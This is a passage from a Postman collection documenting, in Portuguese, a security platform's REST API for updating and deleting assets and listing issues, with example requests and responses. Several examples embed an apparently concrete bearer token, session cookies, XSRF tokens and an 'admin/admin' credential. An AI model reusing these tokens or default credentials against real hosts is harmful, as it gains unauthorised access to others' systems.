COMPANY.</p>\n","type":"text"},{"key":"company.phone_number","value":"String","description":"<p>Número de Telefone do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.doc_number","value":"String","description":"<p>Número de Documento do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"cloud","value":"Object","description":"<p>[opcional se type==CLOUD] Objeto contendo \"instance_id\", \"provider\", \"instance_type\", \"region\", \"image_id\", \"internal_ip_addresses\", \"public_ip_address\" e \"security_groups\" como mostrado abaixo.</p>\n","type":"text"},{"key":"cloud.instace_id","value":"String","description":"<p>Instance ID do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.provider","value":"String","description":"<p>Provider do Ativo do tipo CLOUD. Pode ser: \"AWS\", \"AZURE\", \"DOCKER\" ou \"DHCP\".</p>\n","type":"text"},{"key":"cloud.instance_type","value":"String","description":"<p>Instance Type do Ativo do tipo CLOUD. Exemplo: \"EC2\".</p>\n","type":"text"},{"key":"cloud.region","value":"String","description":"<p>Região do Ativo do tipo CLOUD. Exemplo: \"us-west-2\".</p>\n","type":"text"},{"key":"cloud.image_id","value":"String","description":"<p>Image ID do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.internal_ip_addresses","value":"List<String>","description":"<p>Lista de IPs internos do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.public_ip_address","value":"String","description":"<p>IP externo do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.security_groups","value":"List<String>","description":"<p>Lista de Security Groups de Ativos do tipo CLOUD.</p>\n","type":"text"},{"key":"person","value":"Object","description":"<p>[opcional se type==PERSON] Objeto contendo \"first_name\", \"last_name\", \"doc_number\", \"phone_number\", \"social_networks\" e \"address\" como mostrado abaixo.</p>\n","type":"text"},{"key":"person.first_name","value":"String","description":"<p>Primeiro Nome do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.last_name","value":"String","description":"<p>Sobrenome do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.doc_number","value":"String","description":"<p>Número de Documento do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.phone_number","value":"String","description":"<p>Número de Telefone do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.social_networks","value":"List<Object>","description":"<p>Lista de Objetos contendo \"name\" e \"link\" como mostrado abaixo.</p>\n","type":"text"},{"key":"person.social_networks.name","value":"String","description":"<p>Nome da Rede Social do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.social_networks.link","value":"String","description":"<p>Link da Rede Social do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address","value":"Object","description":"<p>Objeto contendo \"street\", \"number\", \"city\", \"state\", \"country\" e \"postal_code\" como mostrado abaixo.</p>\n","type":"text"},{"key":"person.address.street","value":"String","description":"<p>Rua do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.number","value":"String","description":"<p>Número do Endereço do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.city","value":"String","description":"<p>Cidade do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.state","value":"String","description":"<p>Estado do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.country","value":"String","description":"<p>País do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.postal_code","value":"String","description":"<p>Código Postal do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"process","value":"Object","description":"<p>[opcional se type==PROCESS] Objeto contendo \"description\" como mostrado abaixo.</p>\n","type":"text"},{"key":"process.description","value":"String","description":"<p>Descrição do Ativo do tipo PROCESS.</p>\n","type":"text"},{"key":"others","value":"Object","description":"<p>[opcional se type==OTHERS] Objeto contendo \"key\", \"description\", \"severity\", tags\", \"asset_group\" como mostrado abaixo.</p>\n","type":"text"},{"key":"others.key","value":"String","description":"<p>Nome do ativo tipo OTHERS</p>\n","type":"text"},{"key":"others.description","value":"String","description":"<p>Descrição do ativo tipo OTHERS</p>\n","type":"text"}]},"url":"https://<instance>/api/v2/assets/<asset_id>","description":"<p>Esse <em>endpoint</em> permite atualizar um Ativo existente. Os campos irão depender do TIPO do Ativo. O servidor irá retornar \"400: Bad Request\" caso tente alterar o tipo do Ativo. Tentar adicionar um objeto de outro tipo de Ativo não terá efeito.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","assets","<asset_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"0fbed9c9-90a3-4d12-841e-66eebedef075","name":"Try to change the Asset Type","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PERSON\"\n}"},"url":"https://homolog.gat.digital/api/v1/assets/5cd309a0c569d571d3afcd7f"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:15:11 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0va4ocs50t5zm1ivyqu9v2a5im3553.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0zi654ji1b4izijj7v5zm469i3563.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=caa941ce-7810-4caf-86f6-bf2d796d522f;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0zi654ji1b4izijj7v5zm469i3563.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"caa941ce-7810-4caf-86f6-bf2d796d522f","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"hostname\": \"google.com\",\r\n    \"score\": 0,\r\n    \"type\": \"APPLICATION\",\r\n    \"severity\": 0,\r\n    \"port\": 80,\r\n    \"asset_id\": \"5cd309a0c569d571d3afcd7f\",\r\n    \"app_url\": \"http://teste.com.br\",\r\n    \"app_credentials\": \"admin/admin\",\r\n    \"app_description\": \"Web app description\"\r\n}"},{"id":"dbbe4015-364b-49ce-890d-bdc3bcf00382","name":"Conflict on Update","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"app_url\": \"https://www.google.com\"\n}"},"url":"https://subdomain.gat.digital/api/v1/assets/5cd309a0c569d571d3afcd7f"},"status":"Conflict","code":409,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:14:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0zaojsk1qu7w6auitvnhqjuqj3510.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01dqhkkeiri7m714infihn2liqv3537.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=e11d46a8-b896-430e-96f3-e972e8abc2d7;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01dqhkkeiri7m714infihn2liqv3537.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"e11d46a8-b896-430e-96f3-e972e8abc2d7","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"error\": \"ALREADY EXISTS IN DATABASE\"\r\n}"},{"id":"2ef66d7f-0f56-4490-b5c5-d2aa906de1dd","name":"Update an Asset","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"hostname\": \"dmz112.servicos-dmz\",\n\t\"netbios\": \"DMZ112\",\n\t\"severity\": \"3\"\n}"},"url":"https://subdomain.gat.digital/api/v1/assets/5ab9178ee12f5e05704b903c"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:13:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node014q7bmqg8s7y414w3wen3ulbvo3347.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0zaojsk1qu7w6auitvnhqjuqj3510.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=58cb9df5-79a0-4f81-8704-9eb33d0a0d2f;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0zaojsk1qu7w6auitvnhqjuqj3510.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"58cb9df5-79a0-4f81-8704-9eb33d0a0d2f","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"hostname\": \"dmz112.servicos-dmz\",\r\n    \"score\": 0,\r\n    \"type\": \"HOST\",\r\n    \"severity\": 3,\r\n    \"asset_id\": \"5ab9178ee12f5e05704b903c\",\r\n    \"asset_group\": [\r\n        \"5ab91862e12f5e056e329781\"\r\n    ],\r\n    \"host_ip\": \"192.168.1.12\",\r\n    \"host_os\": \"\\nMicrosoft Windows 10 Enterprise Insider Preview\",\r\n    \"host_netbios\": \"DMZ112\"\r\n}"}],"_postman_id":"579742d8-d8cf-4462-94a2-0e372d430df1"},{"name":"Delete an Asset","id":"043560af-5a4a-4f50-92be-058d6b8cb896","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"id","value":"List<String>","description":"<p>Uma lista contendo os IDs dos Ativos que irão ser deletados.</p>\n","type":"text"}]},"url":"https://<instance>/api/v2/assets","description":"<p>Esse <em>endpoint</em> permite deletar um ou mais Ativos.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","assets"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"50847966-3264-4912-a565-30c5887b120b","name":"Delete two Assets","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5ab9178ee12f5e05704b903d\", \"5ca4fc4ec569d523f821c7ad\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/assets"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:17:03 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0zi654ji1b4izijj7v5zm469i3563.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01b35o9yzi480xhq5iiepsw5e23608.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=62a398dc-fc4a-4d62-8e61-4e4e8b5937c6;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01b35o9yzi480xhq5iiepsw5e23608.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"62a398dc-fc4a-4d62-8e61-4e4e8b5937c6","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"deleted\": 2,\r\n    \"deleted_ids\": [\r\n        \"5ab9178ee12f5e05704b903d\",\r\n        \"5ca4fc4ec569d523f821c7ad\"\r\n    ],\r\n    \"not_deleted\": 0\r\n}"},{"id":"b5685e35-e2dd-4a9e-8e76-c4986923220f","name":"Malformed Request Body","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"id\": \"5ca4fc4ec569d523f821c7ad\"\n}"},"url":"https://homolog.gat.digital/api/v1/assets"},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Mon, 17 Jun 2019 17:24:55 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0b06qx2dym2hx1cczjp3xwmvhx3763.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01mwshbqrty82o154tfnnm3koyu3784.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=5b490c09-e54c-4e16-a6dc-b3155be32b0a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01mwshbqrty82o154tfnnm3koyu3784.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"5b490c09-e54c-4e16-a6dc-b3155be32b0a","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"14601ac0-e9d8-4696-9776-5685ef133b17","name":"Some Assets were not Found","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5ca4fc4ec569d523f821c7ad\", \"5ab9178ee12f5e0570000000\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/assets"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:23:57 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0p0bva1hpn3nn13bxa6k8cg5da3720.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0b06qx2dym2hx1cczjp3xwmvhx3763.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=900a6f76-d52f-4fe4-8711-f03d04285006;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0b06qx2dym2hx1cczjp3xwmvhx3763.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"900a6f76-d52f-4fe4-8711-f03d04285006","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"deleted\": 1,\n    \"not_deleted\": 1,\n    \"not_deleted_details\": [\n        {\n            \"short_msg\": \"Unable to delete Asset.\",\n            \"long_msg\": \"Invalid id\",\n            \"asset_id\": \"5ab9178ee12f5e0570000000\"\n        }\n    ]\n}"}],"_postman_id":"043560af-5a4a-4f50-92be-058d6b8cb896"}],"id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","description":"<p>O GAT se diferencia da maioria das demais soluções permitindo a visão e o gerenciamento da segurança de diversos tipos de Ativos. Atualmente, o GAT trabalha com os seguintes tipos de Ativos:</p>\n<ul>\n<li>Host (baseado no endereço IP)</li>\n<li>Aplicação (baseado na URL)</li>\n<li>Pessoa (baseado no endereço de email)</li>\n<li>Empresa</li>\n<li>Processo</li>\n<li>Cloud</li>\n</ul>\n<p>Uma boa gestão de Ativos é essencial para ter uma visão clara sobre seu risco cibernético.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"17a6cdc4-b1fc-4499-9e56-a08e386ee5bf"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"5c933907-0805-4bdd-b2e0-adbbe1c18980"}}],"_postman_id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6"},{"name":"Apontamentos","item":[{"name":"Issues","id":"9d5e7e1f-6b70-4d43-b601-244858215524","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"url":"https://<instance>/api/v2/issues?size=30&page=0","description":"<p>Este endpoint permite que você recupere os Apontamentos ativos na Base de Dados. Ele utiliza paginação, com parâmetro <strong>size</strong> e <strong>page</strong>. Se não forem especificados, <strong>size</strong> será 30 e <strong>page</strong> será 0 por padrão. Você pode recuperar até no máximo 200 registros de uma vez. Se houverem mais de 200 Apontamentos na sua Base de Dados, você irá precisar buscar os outros especificando as próximas <strong>pages</strong>.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","issues"],"host":["<instance>"],"query":[{"description":{"content":"<p>[Optional] Quantos resultados você quer. Padrão são 30. Máximo são 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[Optional] Qual página você deseja recuperar</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"2aaa1a82-da3c-4398-8c74-1a7fe689b6de","name":"Retornando Apontamentos","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"url":{"raw":"https://instance/api/v2/issues?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v2","issues"],"query":[{"key":"size","value":"30","description":"[Optional] Quantos resultados você quer. Padrão são 30. Maxímo são 200"},{"key":"page","value":"0","description":"[Optional] Qual página você deseja recuperar"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"language\": \"en\",\n            \"title\": \"Definir a Gestão dos Ativos de Informação\",\n            \"severity\": 2,\n            \"type\": \"VULNERABILITY\",\n            \"vulnerability\": {\n                \"status\": \"PENDING\",\n                \"confidentiality\": \"NONE\",\n                \"integrity\": \"NA\",\n                \"host\": {\n                    \"protocol\": \"tcp\"\n                },\n                \"app\": {}\n            },\n            \"control\": {},\n            \"baseline\": {},\n            \"phishing\": {},\n            \"issue_id\": \"628672c40d85567d25f1b67f\",\n            \"kb_id\": \"628672c30d85567cbc2e7a75\",\n            \"asset_id\": \"6283c8e00d855679726d4f83\",\n            \"id_gat_detail\": 2685,\n            \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n            \"creation_date\": \"2022-05-19T13:39:32\",\n            \"last_seen_date\": \"2022-05-19T13:39:32\",\n            \"responsible_id\": \"627e75840d855616e1399729\",\n            \"source_scan\": \"GATAPI\",\n            \"base_status\": \"OPEN\",\n            \"data_breach\": {}\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"New Os Identification\",\n            